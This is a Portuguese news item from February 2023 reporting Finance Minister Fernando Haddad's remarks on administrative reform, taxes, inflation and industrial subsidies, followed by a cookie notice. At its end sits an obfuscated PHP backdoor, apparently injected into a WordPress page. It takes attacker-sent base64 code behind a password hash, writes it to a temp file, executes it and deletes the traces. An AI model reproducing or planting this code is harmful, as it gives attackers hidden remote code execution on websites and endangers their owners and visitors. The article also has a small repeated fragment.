• 15.02.2023
  • Redação

Haddad: É ilusório achar que reforma administrativa vai representar grandes cortes de despesa

A afirmação do ministro da Fazenda foi feita em jantar promovido pelo grupo Esfera Brasil, em Brasília

O ministro da Fazenda, Fernando Haddad, afirmou na noite desta quarta-feira (15) que “é ilusório achar que reforma administrativa vai representar grandes cortes de despesa”. A afirmação foi feita em jantar promovido pelo grupo Esfera Brasil, em Brasília.

Segundo ele, a reforma administrativa não “precisa ir na frente da tributária”. Haddad afirmou

Haddad afirmou que os altos salários dos servidores estão no Judiciário e Legislativo e que é preciso “mais transparência”.

O ministro também disse que “há várias brechas para criar penduricalhos” sobre os quais não incide o Imposto de Renda (IR) atualmente.

A respeito de política monetária e inflação, afirmou que a trajetória de preços no Brasil “só está perdendo para Israel e Japão”. Também disse que “todo mundo está com juros reais negativos [entre os países], com raríssimas exceções”.

O ministro afirmou que a separação entre política monetária e fiscal “não existe mais em nenhum lugar do mundo” e defendeu que é preciso “fortalecer mais” o Conselho Monetário Nacional (CMN).

Ainda afirmou que “estamos no rescaldo” das propostas de emenda à Constituição (PECs) do ano passado, que, segundo ele, tiveram custo fiscal elevado. “Cada ano é uma PEC”, disse.

Por fim, afirmou que é importante “não ter a velha mentalidade de ficar dando subsídio” para a indústria.

Matéria publicada em 15/02/2023 pelo https://valor.globo.com

x

Utilizamos cookies e outras tecnologias para lhe oferecer uma experiência de navegação melhor, analisar o tráfego do site e personalizar o conteúdo, de acordo com a nossa Política de Privacidade. Ao continuar navegando, você concorda com estas condições.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}